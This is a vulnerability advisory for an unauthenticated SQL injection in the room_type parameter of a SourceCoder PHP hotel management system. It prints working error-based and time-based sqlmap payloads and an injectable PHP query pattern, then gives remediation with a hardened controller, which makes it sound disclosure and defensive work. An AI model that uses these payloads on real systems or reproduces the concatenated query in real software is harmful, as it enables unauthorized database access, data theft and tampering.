# SourceCoder Hotel Management System SQL Injection Vulnerability Summary

## Vulnerability Overview

* **Vulnerability Name**: SourceCoder Hotel Management System `/index.php/reservation/check` SQL Injection
* **Vulnerability Type**: SQL Injection
* **Affected Product**: PHP hotel management system developed using the CodeIgniter framework
* **Vulnerable Location**: `/index.php/reservation/check` file
* **Trigger Parameter**: `room_type` (POST request)
* **Exploitation Condition**: No login or authorization required for exploitation
* **Root Cause**: Attackers inject malicious code into the `room_type` parameter, which is used directly in SQL queries without proper sanitization or validation.

## Impact Scope

* **Affected Version**: V1.0
* **Impact Description**: Attackers can leverage this vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, full system control, and even cause service disruption, posing a serious threat to system security and business continuity.

## Vulnerability Exploitation Code (POC)

**Payload 1 (Error-based):**

```text
Parameter: room_type (POST)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7874952 WHERE 2021=2021 AND GTID_SUBSET(CONCAT(0x7171717171,0x7874952,0x7171717171),FLOOR(RAND(0)*2)))-- -
    Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]', [QUERY], '[DELIMITER_STOP]'), [RANDOM])
```

**Payload 2 (Time-based blind):**

```text
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7646966 WHERE 9079=9079 AND (SELECT 2429 FROM (SELECT(SLEEP(5)))RANDSTR))-- -
    Vector: AND (SELECT [RANDOMNUM] FROM (SELECT(SLEEP(5)))RANDSTR))-- -
```

**Key Payload from SQLMap Test Output Screenshot:**

```text
POST parameter 'room_type' is vulnerable. Do you want to keep testing the others?
[sqlmap] (0.6.0) used the default behavior, running in batch mode
sqlmap identified the following injection point(s) with a total of 1593 HTTP(s) requests:
Parameter: room_type (POST)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7874952 WHERE 2021=2021 AND GTID_SUBSET(CONCAT(0x7171717171,0x7874952,0x7171717171),FLOOR(RAND(0)*2)))-- -
    Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]', [QUERY], '[DELIMITER_STOP]'), [RANDOM])

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7646966 WHERE 9079=9079 AND (SELECT 2429 FROM (SELECT(SLEEP(5)))RANDSTR))-- -
    Vector: AND (SELECT [RANDOMNUM] FROM (SELECT(SLEEP(5)))RANDSTR))-- -
```

## Remediation Measures

1. **Use Prepared Statements and Parameter Binding**: Prepared statements prevent SQL injection by separating SQL code from user input data. When using prepared statements, user input values are treated as pure data and will not be interpreted as SQL code.
2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to expected formats.
3. **Minimize Database User Privileges**: Ensure the account used to connect to the database has only the minimum necessary privileges. Avoid using accounts with high-level permissions (such as root or admin) for routine operations.
4. **Regular Security Audits**: Conduct regular code and system security audits to promptly identify and fix potential security vulnerabilities.
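As an added example (not code from the SourceCoder project, whose source is not shown here), remedies 1 and 2 applied to a hypothetical CodeIgniter 3 controller serving the `reservation/check` route; the table and column names (`rooms`, `room_type`, `status`) and the room-type whitelist are assumptions.

```php
<?php
// Added example: a hypothetical CodeIgniter 3 controller for /index.php/reservation/check.
// Table/column names and the room-type list are assumptions, not the project's own code.
class Reservation extends CI_Controller
{
    // Constructed whitelist; a real application would derive this from its own room data.
    private $allowed_room_types = ['Standard', 'Deluxe', 'Suite'];

    // INJECTABLE PATTERN (the root cause described above): room_type is concatenated
    // into the SQL string, so a single quote in the value closes the string literal
    // and the remainder of the value is parsed by MySQL as SQL syntax.
    public function check_vulnerable()
    {
        $room_type = $this->input->post('room_type');
        $sql = "SELECT * FROM rooms WHERE room_type = '" . $room_type . "' AND status = 'available'";
        $rooms = $this->db->query($sql)->result_array();
        echo json_encode($rooms);
    }

    // HARDENED: validate against a whitelist, then pass the value as a query binding.
    public function check()
    {
        $room_type = (string) $this->input->post('room_type', true);

        // Remedy 2: room_type is an enumerated value, so reject anything outside the
        // known set rather than trying to "clean" arbitrary input.
        if (!in_array($room_type, $this->allowed_room_types, true)) {
            $this->output->set_status_header(400);
            echo json_encode(['error' => 'invalid room_type']);
            return;
        }

        // Remedy 1: query binding. CodeIgniter escapes each bound value before
        // substituting it for the ? placeholder, so the value is always compared
        // as data and never interpreted as SQL code.
        $sql = "SELECT * FROM rooms WHERE room_type = ? AND status = 'available'";
        $rooms = $this->db->query($sql, [$room_type])->result_array();

        echo json_encode($rooms);
    }
}
```

The whitelist check alone would already block the payloads above; the binding is kept as well so that the query stays safe if the list of room types later comes from a free-form source.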